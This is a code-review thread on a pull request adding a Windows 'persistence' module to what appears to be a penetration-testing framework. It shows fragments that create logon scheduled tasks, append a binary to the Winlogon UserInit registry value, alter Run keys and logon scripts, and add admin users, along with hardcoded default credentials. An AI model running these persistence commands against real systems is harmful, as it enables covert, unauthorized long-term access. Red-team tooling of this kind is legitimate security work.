Working Persistence Module #496
Conversation
kapla0011
requested review from
zblurx,
Marshall-Hallenbeck,
NeffIsBack and
mpgn
as code owners
|
Thanks for the PR! Having screenshots while reviewing definitely helps a lot :) |
| self.BINARY = "Do_not_execute" | ||
| self.user = "kapla2" | ||
| self.password = "Join_The_0xH3xSec_Community!" | ||
| self.file = "Do_not_execute" |
There was a problem hiding this comment.
Set these to empty strings
| Created by Lorenzo Meacci @kapla founder of the 0xH3xSec community! | ||
| """ | ||
|
|
||
| name = 'persistence' |
There was a problem hiding this comment.
Use double quotes
|
|
||
| name = 'persistence' | ||
| description = "Implements techniques for persistence used by malicious actors" | ||
| supported_protocols = ['smb'] |
There was a problem hiding this comment.
Use double quotes
| if 'USER' in module_options: | ||
| self.user = module_options['USER'] | ||
| if 'PASS' in module_options: | ||
| self.password = module_options['PASS'] | ||
| if 'BINARY' in module_options: | ||
| self.BINARY = module_options['BINARY'] | ||
| if 'FILE' in module_options: | ||
| self.file = module_options['FILE'] | ||
| if 'FILE_NAME' in module_options: | ||
| self.file_name = module_options['FILE_NAME'] |
There was a problem hiding this comment.
Use double quotes
| if self.user == "kapla2" and self.password == "Join_The_0xH3xSec_Community!": | ||
| context.log.highlight("No credentials were submitted!!! Using default user and default password!!!") |
There was a problem hiding this comment.
I would remove these, set the defaults to blank, and then if after initialization they are still blank, throw an error right away.
|
|
||
| def logon_script(self , context , connection): | ||
| """ | ||
| Setup's one of the registry value to the specified .bat file |
There was a problem hiding this comment.
Incorrect grammar. Should rephrase to "Sets the user logon script regkey to specified bat file"
| command = f'schtasks /create /sc onlogon /tn UpDater2.0 /tr "{self.BINARY}"' | ||
| context.log.highlight(f'Creating the logon task with the path : {self.BINARY}') |
There was a problem hiding this comment.
Use double quotes
| """ | ||
| Created a task that triggers at logon | ||
| """ | ||
| command = f'schtasks /create /sc onlogon /tn UpDater2.0 /tr "{self.BINARY}"' |
There was a problem hiding this comment.
Can you add the ability to pass in the scheduled task name? Otherwise it should probably default to the binary name.
| command = fr'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "UserInit" /T REG_SZ /D "C:\Windows\system32\userinit.exe,{self.BINARY}" /F' | ||
| context.log.highlight(fr'Modifying the WinLogon UserInit value to : C:\Windows\system32\userinit.exe , {self.BINARY}') |
There was a problem hiding this comment.
Use double quotes
| if self.file == "Do_not_execute" and self.file_name == "": | ||
| context.log.error("You need to specify the file path FILE= and how you want to save the file on the system FILE_NAME") |
There was a problem hiding this comment.
Just default to blank script name and then check on initialization if its still blank.
For now the rrp library has been removed from the module. This is the usage of each of the techniques:
add_user: This methods adds a new user to the admin group
We can also specify some input credentials:
Checking if the credentials are valid:
file_upload:
This is just an upload function for file transfer purposes
malicious_binary
This technique involves copying a binary from a specified path to the user's startup folder.
proof:
registry_run:
This technique involves modifying the registry's Run key. Any executable path listed in the Run key will be executed when a user logs into the machine.
proof:
logon_scripts:
This techinique works by adding to the Logon Registry value the path of a .bat file with some custom commands inside.
proof:
scheduled_task:
creates a scheduled task that starts at every logon:
query the task:
win_logon_userinit:
the module adds to the UserInit value of winlogon the path of the malware:
query the registry: